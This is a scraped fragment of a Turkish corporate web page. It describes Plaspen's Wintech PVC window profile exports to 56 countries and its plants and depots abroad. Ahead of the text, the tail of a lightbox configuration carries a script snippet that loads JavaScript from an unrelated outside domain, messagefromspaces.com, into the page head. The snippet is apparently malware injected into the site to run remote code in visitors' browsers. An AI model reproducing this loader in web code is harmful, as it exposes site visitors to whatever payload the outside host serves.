, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
İhracatımız

Plaspen, ileri teknoloji ile ürettiği PVC profilleri Wintech markası ile dünyanın dört bir yanında 56 ülkeye ihraç etmektedir. Antalya Organize Sanayi Bölgesi’ ndeki dev üretim tesislerinde gerçekleştirilen üretimler ile hem yurt içi hem de yurtdışı talepler karşılanmaktadır.

Almanya, Rusya, Azerbaycan, Ukrayna, Hindistan ve Tunus’ta üretim tesislerini faaliyete geçiren Plaspen, Wintech markası ile “dünyanın pencerecisi” olma yönünde emin adımlarla ilerlemektedir.

Wintech ürünleri, öncelikle Avrupa, Doğu Avrupa, Ortadoğu, Asya ve Kuzey Afrika ülkelerinin yanı sıra Avusturalya’dan Amerika’ya kadar dünyanın dört bir yanına dağıtılmaktadır. Wintech, fabrikalarının yanı sıra Romanya, Kazakistan, Polonya, Fransa ve Dubai’deki ana dağıtım depolarıyla tüketiciye daha yakın olmakta, hızlı ve yaygın dağıtım gerçekleştirmektedir.

Wintech sayfasına ulaşmak için tıklayınız.